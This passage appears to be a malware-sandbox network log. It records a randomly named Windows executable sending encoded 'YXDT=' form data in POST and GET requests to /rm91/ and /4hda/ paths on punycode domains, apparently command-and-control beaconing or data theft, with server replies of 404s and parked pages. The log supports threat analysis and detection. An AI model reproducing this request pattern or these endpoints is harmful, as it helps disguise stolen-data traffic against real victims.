Aug 12, 2024 05:14:25.277841091 CEST	1236	IN	Data Raw: 53 48 75 4f 33 4e 64 72 56 7a 67 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 Data Ascii: SHuO3NdrVzg=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.bfiworkerscomp.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.bfiworkerscomp.com/px.js?ch=2"></scr
Aug 12, 2024 05:14:25.277877092 CEST	413	IN	Data Raw: 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d Data Ascii: <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content=
Aug 12, 2024 05:14:25.277923107 CEST	737	IN	Data Raw: 74 22 3e 0d 0a 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0d 0a 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 Data Ascii: t"> document.write( '<script type="text/javascript" language="JavaScript"' + 'src="//sedoparking.com/frmpark/' + window.location.host + '/' + 'Skenzor7' + '/park.js?reg_logo=netsol-logo.png&amp

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49748	43.252.167.188	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:40.244437933 CEST	792	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 46 51 39 4f 55 2b 34 35 30 6c 42 42 64 6a 79 59 48 6a 6f 39 48 38 38 2f 6f 48 34 55 49 52 59 57 32 68 2b 37 42 37 64 54 2f 68 52 48 33 42 62 73 58 65 78 30 70 63 4b 46 2f 54 32 52 47 5a 78 6d 68 42 79 6b 50 78 54 6a 4c 73 49 63 76 33 48 77 73 68 51 6f 2b 2f 65 61 75 73 4d 70 4b 79 43 5a 34 50 44 2f 53 72 4f 6a 70 4d 57 52 4b 46 67 53 53 41 43 5a 2b 6b 61 64 6d 6f 69 67 41 59 50 42 38 46 76 68 64 70 57 68 6a 38 36 4c 70 45 53 68 32 7a 35 73 50 42 45 45 45 38 4f 65 58 67 67 4b 66 79 41 63 45 31 64 46 65 67 71 6e 77 43 46 69 53 34 59 6c 4a 77 3d 3d Data Ascii: YXDT=uQ1boOTJ7vI9FQ9OU+450lBBdjyYHjo9H88/oH4UIRYW2h+7B7dT/hRH3BbsXex0pcKF/T2RGZxmhBykPxTjLsIcv3HwshQo+/eausMpKyCZ4PD/SrOjpMWRKFgSSACZ+kadmoigAYPB8FvhdpWhj86LpESh2z5sPBEEE8OeXggKfyAcE1dFegqnwCFiS4YlJw==
Aug 12, 2024 05:14:41.119555950 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:22:04 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49749	43.252.167.188	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:42.776278019 CEST	812	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 45 49 57 33 46 36 37 43 2f 42 54 38 68 52 48 38 68 62 54 5a 2b 78 2f 70 63 33 6d 2f 53 61 52 47 5a 31 6d 68 41 43 6b 4d 43 37 6b 52 63 49 61 32 6e 48 75 7a 78 51 6f 2b 2f 65 61 75 73 49 51 4b 30 71 5a 35 36 4c 2f 54 4f 79 69 33 63 57 57 65 56 67 53 57 41 43 56 2b 6b 61 2f 6d 73 37 50 41 61 48 42 38 46 66 68 54 63 6a 33 74 38 36 4e 6e 6b 54 6c 34 47 64 6f 57 68 6c 50 62 63 57 62 64 41 6f 57 65 30 52 47 56 45 38 53 4d 67 4f 55 74 46 4d 57 66 37 6c 73 53 78 49 78 41 69 4e 77 71 43 45 7a 38 35 2f 37 7a 71 57 34 66 70 77 3d Data Ascii: YXDT=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIEIW3F67C/BT8hRH8hbTZ+x/pc3m/SaRGZ1mhACkMC7kRcIa2nHuzxQo+/eausIQK0qZ56L/TOyi3cWWeVgSWACV+ka/ms7PAaHB8FfhTcj3t86NnkTl4GdoWhlPbcWbdAoWe0RGVE8SMgOUtFMWf7lsSxIxAiNwqCEz85/7zqW4fpw=
Aug 12, 2024 05:14:43.637432098 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:22:07 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49750	43.252.167.188	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:45.309333086 CEST	10894	OUT	POST /rm91/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--fhq1c541j0zr.com Origin: http://www.xn--fhq1c541j0zr.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 10301 Referer: http://www.xn--fhq1c541j0zr.com/rm91/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 75 51 31 62 6f 4f 54 4a 37 76 49 39 4b 54 6c 4f 57 63 51 35 6a 56 42 4f 52 44 79 59 49 44 6f 78 48 38 77 2f 6f 47 74 4a 49 48 6f 57 33 77 75 37 41 65 42 54 39 68 52 48 78 42 62 57 5a 2b 78 75 70 63 66 36 2f 53 47 6e 47 63 70 6d 6a 69 36 6b 59 6a 37 6b 45 4d 49 61 35 48 48 76 73 68 51 35 2b 2f 50 54 75 74 34 51 4b 30 71 5a 35 39 37 2f 58 62 4f 69 31 63 57 52 4b 46 67 57 53 41 44 41 2b 6b 44 49 6d 73 76 6c 56 36 6e 42 6c 6c 50 68 65 4f 37 33 79 4d 36 50 6d 55 54 44 34 47 59 32 57 69 42 6c 62 66 4b 78 64 43 30 57 66 78 51 41 41 6e 73 61 54 6d 65 51 32 6b 6f 4d 45 63 4a 38 62 43 38 2f 44 67 56 73 38 43 77 58 78 4c 69 46 32 61 36 37 62 74 66 66 39 34 41 56 65 53 50 64 45 43 76 35 70 6c 41 61 42 70 6a 49 2f 76 72 59 67 2f 49 35 4f 33 31 63 52 45 39 66 36 59 6b 35 62 4d 7a 51 72 2b 49 4a 37 58 54 4e 31 6d 4a 50 32 33 70 61 4e 65 70 68 2f 53 74 41 66 59 43 54 35 48 59 6d 32 35 59 6f 47 76 78 70 76 30 74 4e 64 74 51 43 72 43 55 39 62 61 31 55 6c 79 56 72 36 34 47 62 49 39 58 48 4c 69 7a 74 30 [TRUNCATED] Data Ascii: YXDT=uQ1boOTJ7vI9KTlOWcQ5jVBORDyYIDoxH8w/oGtJIHoW3wu7AeBT9hRHxBbWZ+xupcf6/SGnGcpmji6kYj7kEMIa5HHvshQ5+/PTut4QK0qZ597/XbOi1cWRKFgWSADA+kDImsvlV6nBllPheO73yM6PmUTD4GY2WiBlbfKxdC0WfxQAAnsaTmeQ2koMEcJ8bC8/DgVs8CwXxLiF2a67btff94AVeSPdECv5plAaBpjI/vrYg/I5O31cRE9f6Yk5bMzQr+IJ7XTN1mJP23paNeph/StAfYCT5HYm25YoGvxpv0tNdtQCrCU9ba1UlyVr64GbI9XHLizt0pVuotL56dcfbRt22sqIkMd51A2wm8EW0SiiNi/QpdtY8XMVE1bwp7GBEL34NQvDeP+UeWn40D/J+yz9oKTMOHMojIE7gwrHQZC3z5phGWjMLqThzYqL4v4hWgBu6MjSrEJ93kGXnxZZ/8fLsyOzpylVY3PZIUFSaXUVMcV9EWisug167GRuBhd63iiG6kUHBGOf8/JSyacK9Whc1aNpDrXFakxg9DsUvjaG2s/DEfgYJLfZTPCoQd5ijEaof0171coCztoVSuQ1msEF+FnhNF7wDIN3+iGk+A3L+18f43ePXdQX+NdciT1g4CDSd14ipxbT1jV1Sm1QFpIXhz1QNtPUQkzRhQDEY2x6RwibrEMn2OQ+LkRrmGCLz5C+DuDpNaonW0MM8DSq1BwhJjeIfs6YbP+366NXxUcl85SJr0sEeKbSwvjzMO+QYy3o9Y4InICSg72javScEAe9yBUfT0HIT32wHcrM6TbOWuMYuib1J61Lxthy37BW2Wa0DJF4j/X1pEK/6Fy09gY7InTaFUn7AeXXXnrzWAt6HNOoYwjEBJ705hAXx1zxI0jQQaLhLFYmeTQQWj1Fc53eNhCnHqD7KGNNWPGNfeHFDCTvaUzaYzbiHbmiWxXImU1bkqsAKvsrHHQjUVqP41wEFaeyhVVotORkpSzlq1l [TRUNCATED]
Aug 12, 2024 05:14:46.413259029 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:22:09 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49751	43.252.167.188	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:47.839350939 CEST	508	OUT	GET /rm91/?ZH3=yf1H3v6h&YXDT=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.xn--fhq1c541j0zr.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 12, 2024 05:14:48.710083961 CEST	367	IN	HTTP/1.1 404 Not Found Date: Mon, 12 Aug 2024 03:22:12 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 6d 39 31 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /rm91/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49752	194.9.94.85	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:53.818006992 CEST	792	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 2f 48 67 49 57 6e 6b 32 43 46 4a 44 59 5a 35 53 2f 5a 30 73 55 33 36 56 4d 78 2b 44 6f 58 76 74 6f 4b 53 57 66 47 4d 6a 79 6b 4d 46 70 30 42 75 67 46 72 74 58 59 6a 77 57 54 4f 56 51 4d 2b 6d 44 32 51 74 6d 4a 76 42 77 63 6e 57 38 42 4a 58 73 7a 71 4b 35 33 51 76 42 74 6d 62 32 64 6d 72 6b 44 69 43 33 2b 66 56 52 76 66 4a 70 41 6a 33 54 7a 55 43 57 5a 74 44 53 52 59 38 45 6f 66 4b 6b 67 77 43 4c 71 33 67 64 35 50 6d 59 43 36 79 41 6f 45 32 58 63 6e 30 59 73 41 46 43 66 32 35 4c 4b 39 55 74 59 5a 59 74 67 75 41 72 58 62 55 38 47 34 48 63 77 3d 3d Data Ascii: YXDT=zHwxZv4P/D2M/HgIWnk2CFJDYZ5S/Z0sU36VMx+DoXvtoKSWfGMjykMFp0BugFrtXYjwWTOVQM+mD2QtmJvBwcnW8BJXszqK53QvBtmb2dmrkDiC3+fVRvfJpAj3TzUCWZtDSRY8EofKkgwCLq3gd5PmYC6yAoE2Xcn0YsAFCf25LK9UtYZYtguArXbU8G4Hcw==
Aug 12, 2024 05:14:54.455980062 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 12 Aug 2024 03:14:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.1.29 Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED] Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]\|\|[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
Aug 12, 2024 05:14:54.456032038 CEST	1236	IN	Data Raw: 65 2f 72 65 73 70 6f 6e 73 69 76 65 2f 69 6d 61 67 65 73 2f 69 4f 53 2d 37 32 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 Data Ascii: e/responsive/images/iOS-72.png" /> <link rel="apple-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale =
Aug 12, 2024 05:14:54.456065893 CEST	1236	IN	Data Raw: 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e Data Ascii: tm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=whois">LoopiaWHOIS</a> to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="htt
Aug 12, 2024 05:14:54.456108093 CEST	672	IN	Data Raw: 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 46 69 6e 64 20 79 6f 75 72 20 64 65 73 69 72 65 64 20 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 69 64 3d 22 73 65 61 72 63 68 2d 62 74 6e 22 20 63 6c 61 73 73 3d 22 62 74 6e Data Ascii: t" placeholder="Find your desired domain"><button id="search-btn" class="btn btn-search" type="submit"></button></form></div><h3>Get full control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able
Aug 12, 2024 05:14:54.456140995 CEST	1236	IN	Data Raw: 65 74 20 73 74 61 72 74 65 64 20 77 69 74 68 20 79 6f 75 72 20 77 65 62 73 69 74 65 2c 20 65 6d 61 69 6c 2c 20 62 6c 6f 67 20 61 6e 64 20 6f 6e 6c 69 6e 65 20 73 74 6f 72 65 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 0a 09 09 09 3c 75 6c 3e 0a 09 09 09 Data Ascii: et started with your website, email, blog and online store.</p><p><ul><li><a href="https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_content=wordpress">Create your websi
Aug 12, 2024 05:14:54.456176043 CEST	206	IN	Data Raw: 6c 6f 6f 70 69 61 2e 63 6f 6d 2f 73 75 70 70 6f 72 74 3f 75 74 6d 5f 6d 65 64 69 75 6d 3d 73 69 74 65 6c 69 6e 6b 26 75 74 6d 5f 73 6f 75 72 63 65 3d 6c 6f 6f 70 69 61 5f 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 Data Ascii: loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb">Contact us</a></p></span></div>... /END #footer --></div>... /END .content --></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49753	194.9.94.85	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:14:56.359544992 CEST	812	OUT	POST /4hda/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.xn--matfrmn-jxa4m.se Origin: http://www.xn--matfrmn-jxa4m.se Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 221 Referer: http://www.xn--matfrmn-jxa4m.se/4hda/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 7a 48 77 78 5a 76 34 50 2f 44 32 4d 38 6e 77 49 51 45 4d 32 41 6c 4a 45 54 35 35 53 31 35 30 6f 55 33 32 56 4d 77 37 62 6f 46 37 74 76 75 57 57 65 48 4d 6a 78 6b 4d 46 37 55 41 6c 75 6c 72 36 58 59 2f 34 57 53 79 56 51 4d 36 6d 44 79 55 74 6d 2b 44 43 78 4d 6e 55 30 68 4a 52 6f 7a 71 4b 35 33 51 76 42 74 44 32 32 64 2b 72 6e 7a 53 43 32 63 33 4b 62 50 65 37 75 41 6a 33 45 6a 56 46 57 5a 73 7a 53 55 34 57 45 71 33 4b 6b 6b 30 43 4c 59 50 6a 4f 5a 4f 74 58 69 36 6e 50 49 45 35 51 50 4b 4a 52 72 6f 2f 4e 74 6d 6c 48 73 73 4f 38 70 34 50 2f 67 4b 7a 32 51 53 67 78 46 46 4f 48 30 77 34 4f 52 4a 79 4d 44 38 49 34 71 37 44 79 2f 52 71 70 6e 34 3d Data Ascii: YXDT=zHwxZv4P/D2M8nwIQEM2AlJET55S150oU32VMw7boF7tvuWWeHMjxkMF7UAlulr6XY/4WSyVQM6mDyUtm+DCxMnU0hJRozqK53QvBtD22d+rnzSC2c3KbPe7uAj3EjVFWZszSU4WEq3Kkk0CLYPjOZOtXi6nPIE5QPKJRro/NtmlHssO8p4P/gKz2QSgxFFOH0w4ORJyMD8I4q7Dy/Rqpn4=
